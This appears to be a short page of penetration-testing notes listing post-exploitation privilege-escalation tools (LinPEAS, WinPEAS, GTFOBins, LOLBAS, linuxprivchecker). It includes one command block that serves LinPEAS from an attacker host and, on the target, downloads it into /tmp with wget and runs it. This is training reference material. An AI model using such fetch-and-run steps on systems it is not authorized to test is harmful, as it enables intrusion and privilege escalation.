Tools and Utilities
Here we can find some tools and utilities commonly used for practices related to post-exploitation:
LinPEAS
Script that searches for possible paths to escalate privileges on Linux/Unix*/MacOS hosts
Commands
Installation
sudo apt install peassUsage
#Host machine
linpeas
python3 -m http.server $port #Create server to send file
#Target machine
cd /tmp
wget http://$hostIP:$port/linpeas.sh
bash linpeas.shWinPEAS
Script that searches for possible paths to escalate privileges on Windows hosts
Commands
Usage
GTFOBins
List of Unix binaries used to bypass local security restrictions in misconfigured systems
LOLBAS
Contains scripts, binaries, and libraries for developing a Living Off the Land attack on Windows
linuxprivchecker
Enumerate basic system info and search for common privilege escalation vectors on Linux systems
Last updated